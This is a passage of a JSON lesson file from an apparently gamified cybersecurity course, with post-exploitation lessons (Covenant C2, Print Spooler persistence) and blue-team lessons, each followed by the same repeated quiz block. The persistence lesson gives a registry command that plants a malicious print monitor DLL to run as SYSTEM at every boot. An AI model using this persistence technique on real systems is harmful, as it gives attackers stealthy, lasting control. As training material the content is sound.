because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1},{"type":"quiz","q":"certutil downloads files because...","opts":["It's an exploit","It's a legitimate LOLBin","It's a web server","It's a compiler"],"ans":1}]},{"id":"px-covenant-c2","cat":"Post-Exploitation","title":"Covenant C2 Framework","diff":3,"xp":200,"intro":"Open-source C2 with Grunt agents and collaborative operation.","sections":[{"type":"text","content":"Covenant provides: web UI, Grunt agents (.NET), encrypted C2 channels, task management, credential tracking, and team collaboration."},{"type":"code","lang":"bash","content":"# Start Covenant\ndotnet run --project Covenant\n# Create listener (HTTP/HTTPS)\n# Generate Grunt (launcher)\n# Deploy to target\n# Task management: shell, assembly, mimikatz\n# Graph view shows lateral movement paths"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Covenant's agents are called...","opts":["Beacons","Grunts","Implants","Shells"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1},{"type":"quiz","q":"certutil downloads files because...","opts":["It's an exploit","It's a legitimate LOLBin","It's a web server","It's a compiler"],"ans":1}]},{"id":"px-printnightmare-persist","cat":"Post-Exploitation","title":"Print Spooler Persistence","diff":4,"xp":250,"intro":"Abuse the Print Spooler for persistent code execution.","sections":[{"type":"text","content":"Add a malicious print monitor DLL that loads every time the Spooler service starts \u2014 which is every boot."},{"type":"code","lang":"powershell","content":"# Add a persistent print monitor\nreg add 'HKLMSYSTEMCurrentControlSetControlPrintMonitorsEvil' /v Driver /d evil.dll /t REG_SZ\n# evil.dll loads in SYSTEM context when Spooler starts\n# Survives reboots, runs as SYSTEM\n# Very hard to detect (legitimate registry path)"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Print monitor persistence runs as...","opts":["The logged-in user","SYSTEM (via the Spooler service)","Network Service","Guest"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1},{"type":"quiz","q":"certutil downloads files because...","opts":["It's an exploit","It's a legitimate LOLBin","It's a web server","It's a compiler"],"ans":1}]},{"id":"df-mfa-types","cat":"Defense & Blue Team","title":"Multi-Factor Authentication Types","diff":1,"xp":50,"intro":"SMS, TOTP, FIDO2, push \u2014 each has different security properties.","sections":[{"type":"text","content":"SMS: weakest (SIM swap). TOTP (Google Authenticator): good. Push notifications: convenient but phishable. FIDO2/WebAuthn: strongest (hardware key, phishing-resistant)."},{"type":"code","lang":"bash","content":"# MFA strength ranking:\n# 1. FIDO2/WebAuthn (hardware key) - phishing-resistant\n# 2. TOTP app (Google/Microsoft Authenticator)\n# 3. Push notification (Duo) - vulnerable to fatigue attacks\n# 4. SMS - weakest (SIM swap, SS7 interception)"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"The strongest MFA type is...","opts":["SMS","TOTP","Push notification","FIDO2/WebAuthn (hardware security key)"],"ans":3},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention matters because...","opts":["Space","Needed for incident investigation","Slow systems","Contain passwords"],"ans":1},{"type":"quiz","q":"Threat modeling identifies...","opts":["Network speed","Potential threats during design","Encryption strength","User satisfaction"],"ans":1},{"type":"quiz","q":"DMZ is...","opts":["Encryption","Zone between internal and external networks","User group","Firewall brand"],"ans":1},{"type":"quiz","q":"SOC stands for...","opts":["Security Operations Center","System Output","Secure Online","Standard Operating"],"ans":0},{"type":"quiz","q":"NIST 800-53 provides...","opts":["Algorithms","Security controls catalog","Diagrams","Passwords only"],"ans":1},{"type":"quiz","q":"XDR extends EDR by...","opts":["More endpoints","Correlating across endpoints, network, cloud","Speed","Cost"],"ans":1},{"type":"quiz","q":"Security baseline is...","opts":["Attack start","Minimum security configuration","Firewall","Encryption key"],"ans":1},{"type":"quiz","q":"Playbook defines...","opts":["Game strategy","Pre-defined response steps for incidents","Log file","Firewall rule"],"ans":1},{"type":"quiz","q":"SOAR automates...","opts":["Attacks","Repetitive SOC tasks","Encryption","Development"],"ans":1},{"type":"quiz","q":"Sigma rules convert to...","opts":["Only Splunk","Any SIEM query language","Only Elastic","Only KQL"],"ans":1},{"type":"quiz","q":"False positive means...","opts":["Real attack detected","Normal traffic flagged as attack","Attack missed","IDS crashed"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One firewall","Multiple overlapping security layers","Deep inspection","Encrypt everything"],"ans":1},{"type":"quiz","q":"Incident classification P1 means...","opts":["Low","Critical active breach","Medium","Info"],"ans":1},{"type":"quiz","q":"3-2-1 backup rule is...","opts":["3 servers","3 copies, 2 media, 1 offsite","3 keys","3 passwords"],"ans":1}]},{"id":"df-waf-deployment","cat":"Defense & Blue Team","title":"WAF Deployment Strategies","diff":2,"xp":150,"intro":"Deploy a WAF correctly \u2014 avoid false positives and performance impact.","sections":[{"type":"text","content":"Start in detection/learning mode, tune rules against normal traffic, then switch to blocking. Regularly update rulesets. Don't rely on WAF alone \u2014 it's defense in depth."},{"type":"code","lang":"bash","content":"# ModSecurity deployment:\n# 1. Install + enable OWASP CRS\n# 2. Start in DetectionOnly mode\nSecRuleEngine DetectionOnly\n# 3. Monitor for false positives (1-2 weeks)\n# 4. Tune: exclude legitimate patterns\nSecRuleRemoveById 942100\n# 5. Switch to blocking\nSecRuleEngine On"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"WAF should start in which mode?","opts":["Blocking immediately","Detection/learning mode first (to identify false positives)","Disabled","Passthrough"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention matters because...","opts":["Space","Needed for incident investigation","Slow systems","Contain passwords"],"ans":1},{"type":"quiz","q":"Threat modeling identifies...","opts":["Network speed","Potential threats during design","Encryption strength","User satisfaction"],"ans":1},{"type":"quiz","q":"DMZ is...","opts":["Encryption","Zone between internal and external networks","User group","Firewall brand"],"ans":1},{"type":"quiz","q":"SOC stands for...","opts":["Security Operations Center","System Output","Secure Online","Standard Operating"],"ans":0},{"type":"quiz","q":"NIST 800-53 provides...","opts":["Algorithms","Security controls catalog","Diagrams","Passwords only"],"ans":1},{"type":"quiz","q":"XDR extends EDR by...","opts":["More endpoints","Correlating across endpoints, network, cloud","Speed","Cost"],"ans":1},{"type":"quiz","q":"Security baseline is...","opts":["Attack start","Minimum security configuration","Firewall","Encryption key"],"ans":1},{"type":"quiz","q":"Playbook defines...","opts":["Game strategy","Pre-defined response steps for incidents","Log file","Firewall rule"],"ans":1},{"type":"quiz","q":"SOAR automates...","opts":["Attacks","Repetitive SOC tasks","Encryption","Development"],"ans":1},{"type":"quiz","q":"Sigma rules convert to...","opts":["Only Splunk","Any SIEM query language","Only Elastic","Only KQL"],"ans":1},{"type":"quiz","q":"False positive means...","opts":["Real attack detected","Normal traffic flagged as attack","Attack missed","IDS crashed"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One firewall","Multiple overlapping security layers","Deep inspection","Encrypt everything"],"ans":1},{"type":"quiz","q":"Incident classification P1 means...","opts":["Low","Critical active breach","Medium","Info"],"ans":1},{"type":"quiz","q":"3-2-1 backup rule is...","opts":["3 servers","3 copies, 2 media, 1 offsite","3 keys","3 passwords"],"ans":1}]},{"id":"df-asset-inventory","cat":"Defense & Blue Team","title":"Asset Inventory Management","diff":1,"xp":50,"intro":"You can't protect what you don't know about.","sections":[{"type":"text","content":"Maintain a live inventory: hardware, software, cloud resources, SaaS subscriptions, APIs, certificates, and third-party integrations. Automate discovery."},{"type":"code","lang":"bash","content":"# Discovery tools:\nnmap -sn 10.0.0.0/24  # network discovery\naws ec2 describe-instances  # cloud inventory\n# Track: owner, criticality, patch status, exposure\n# Update: automated scans + CMDB"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Asset inventory is critical because...","opts":["It saves money","You can't protect assets you don't know about","It's required","It improves performance"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention matters because...","opts":["Space","Needed for incident investigation","Slow systems","Contain passwords"],"ans":1},{"type":"quiz","q":"Threat modeling identifies...","opts":["Network speed","Potential threats during design","Encryption strength","User satisfaction"],"ans":1},{"type":"quiz","q":"DMZ is...","opts":["Encryption","Zone between internal and external networks","User group","Firewall brand"],"ans":1},{"type":"quiz","q":"SOC stands for...","opts":["Security Operations Center","System Output","Secure Online","Standard Operating"],"ans":0},{"type":"quiz","q":"NIST 800-53 provides...","opts":["Algorithms","Security controls catalog","Diagrams","Passwords only"],"ans":1},{"type":"quiz","q":"XDR extends EDR by...","opts":["More endpoints","Correlating across endpoints, network, cloud","Speed","Cost"],"ans":1},{"type":"quiz","q":"Security baseline is...","opts":["Attack start","Minimum security configuration","Firewall","Encryption key"],"ans":1},{"type":"quiz","q":"Playbook defines...","opts":["Game strategy","Pre-defined response steps for incidents","Log file","Firewall rule"],"ans":1},{"type":"quiz","q":"SOAR automates...","opts":["Attacks","Repetitive SOC tasks","Encryption","Development"],"ans":1},{"type":"quiz","q":"Sigma rules convert to...","opts":["Only Splunk","Any SIEM query language","Only Elastic","Only KQL"],"ans":1},{"type":"quiz","q":"False positive means...","opts":["Real attack detected","Normal traffic flagged as attack","Attack missed","IDS crashed"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One firewall","Multiple overlapping security layers","Deep inspection","Encrypt everything"],"ans":1},{"type":"quiz","q":"Incident classification P1 means...","opts":["Low","Critical active breach","Medium","Info"],"ans":1},{"type":"quiz","q":"3-2-1 backup rule is...","opts":["3 servers","3 copies, 2 media, 1 offsite","3 keys","3 passwords"],"ans":1}]},{"id":"df-ir-communication","cat":"Defense & Blue Team","title":"Incident Response Communication","diff":1,"xp":75,"intro":"Who to notify, when, and how during an incident.","sections":[{"type":"text","content":"Communication plan: internal (CISO, legal, PR, management), external (customers, regulators, law enforcement), and technical (IR team, vendors). Use out-of-band channels."},{"type":"code","lang":"bash","content":"# Communication checklist:\n# 1. Technical IR team (immediate, secure channel)\n# 2. CISO / security leadership (within 1 hour)\n# 3. Legal counsel (before any external communication)\n# 4. PR / communications (before customer notification)\n# 5. Regulators (GDPR: 72 hours, HIPAA: 60 days)\n# 6. Law enforcement (if criminal activity)\n# USE: out-of-band channels (attacker may be reading email)"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"IR communications should use...","opts":["Company email","Out-of-band channels (the attacker may be reading internal comms)","Social media","SMS only"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention matters because...","opts":["Space","Needed for incident investigation","Slow systems","Contain passwords"],"ans":1},{"type":"quiz","q":"Threat modeling identifies...","opts":["Network speed","Potential threats during design","Encryption strength","User satisfaction"],"ans":1},{"type":"quiz","q":"DMZ is...","opts":["Encryption","Zone between internal and external networks","User group","Firewall brand"],"ans":1},{"type":"quiz","q":"SOC stands for...","opts":["Security Operations Center","System Output","Secure Online","Standard Operating"],"ans":0},{"type":"quiz","q":"NIST 800-53 provides...","opts":["Algorithms","Security controls catalog","Diagrams","Passwords only"],"ans":1},{"type":"quiz","q":"XDR extends EDR by...","opts":["More endpoints","Correlating across endpoints, network, cloud","Speed","Cost"],"ans":1},{"type":"quiz","q":"Security baseline is...","opts":["Attack start","Minimum security configuration","Firewall","Encryption key"],"ans":1},{"type":"quiz","q":"Playbook defines...","opts":["Game strategy","Pre-defined response steps for incidents","Log file","Firewall rule"],"ans":1},{"type":"quiz","q":"SOAR automates...","opts":["Attacks","Repetitive SOC tasks","Encryption","Development"],"ans":1},{"type":"quiz","q":"Sigma rules convert to...","opts":["Only Splunk","Any SIEM query language","Only Elastic","Only KQL"],"ans":1},{"type":"quiz","q":"False positive means...","opts":["Real attack detected","Normal traffic flagged as attack","Attack missed","IDS crashed"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One firewall","Multiple overlapping security layers","Deep inspection","Encrypt everything"],"ans":1},{"type":"quiz","q":"Incident classification P1 means...","opts":["Low","Critical active breach","Medium","Info"],"ans":1},{"type":"quiz","q":"3-2-1 backup rule is...","opts":["3 servers","3 copies, 2 media, 1 offsite","3 keys","3 passwords"],"ans":1}]},{"id":"df-windows-audit","cat":"Defense & Blue Team","title":"Windows Audit Policy Configuration","diff":2,"xp":150,"intro":"Enable the right audit policies to detect attacker activity.","sections":[{"type":"text","content":"Default Windows logging misses most attacks. Enable: process creation (4688), PowerShell logging (4104), logon events (4624/4625), and object access."},{"type":"code","lang":"bash","content":"# Enable process creation logging with command line\nauditpol /set /subcategory:'Process Creation' /success:enable\nreg add 'HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystemAudit' /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1\n# Enable PowerShell script block logging\nreg add 'HKLMSOFTWAREPoliciesMicrosoftWindowsPowerShellScriptBlockLogging' /v EnableScriptBlockLogging /t REG_DWORD /d 1"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Without audit policies, Windows misses...","opts":["Nothing","Most attacker activity (process creation, PowerShell, etc.)","Only network events","Only file access"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention matters because...","opts":["Space","Needed for incident investigation","Slow systems","Contain passwords"],"ans":1},{"type":"quiz","q":"Threat modeling identifies...","opts":["Network speed","Potential threats during design","Encryption strength","User satisfaction"],"ans":1},{"type":"quiz","q":"DMZ is...","opts":["Encryption","Zone between internal and external networks","User group","Firewall brand"],"ans":1},{"type":"quiz","q":"SOC stands for...","opts":["Security Operations Center","System Output","Secure Online","Standard Operating"],"ans":0},{"type":"quiz","q":"NIST 800-53 provides...","opts":["Algorithms","Security controls catalog","Diagrams","Passwords only"],"ans":1},{"type":"quiz","q":"XDR extends EDR by...","opts":["More endpoints","Correlating across endpoints, network, cloud","Speed","Cost"],"ans":1},{"type":"quiz","q":"Security baseline is...","opts":["Attack start","Minimum security configuration","Firewall","Encryption key"],"ans":1},{"type":"quiz","q":"Playbook defines...","opts":["Game strategy","Pre-defined response steps for incidents","Log file","Firewall rule"],"ans":1},{"type":"quiz","q":"SOAR automates...","opts":["Attacks","Repetitive SOC tasks","Encryption","Development"],"ans":1},{"type":"quiz","q":"Sigma rules convert to...","opts":["Only Splunk","Any SIEM query language","Only Elastic","Only KQL"],"ans":1},{"type":"quiz","q":"False positive means...","opts":["Real attack detected","Normal traffic flagged as attack","Attack missed","IDS crashed"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One firewall","Multiple overlapping security layers","Deep inspection","Encrypt everything"],"ans":1},{"type":"quiz","q":"Incident classification P1 means...","opts":["Low","Critical active breach","Medium","Info"],"ans":1},{"type":"quiz","q":"3-2-1 backup rule is...","opts":["3 servers","3 copies, 2 media, 1 offsite","3 keys","3 passwords"],"ans":1}]},{"id":"df-change-mgmt","cat":"Defense & Blue Team","title":"Change Management for Security","diff":1,"xp":50,"intro":"Track every change to prevent unauthorized modifications.","sections":[{"type":"text","content":"Change management: who changed what, when, why, and was it approved? Unauthorized changes are either attacks or mistakes \u2014 both need detection."},{"type":"code","lang":"bash","content":"# Track changes:\n# 1. Configuration management (Ansible/Puppet/Chef)\n# 2. Version control for infrastructure (Git)\n# 3. File integrity monitoring (AIDE, Tripwire)\n# aide --init && aide --check\n# 4. Change Advisory Board (CAB) approval process"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"File integrity monitoring detects...","opts":["Performance issues","Unauthorized modifications to critical files","Network latency","User 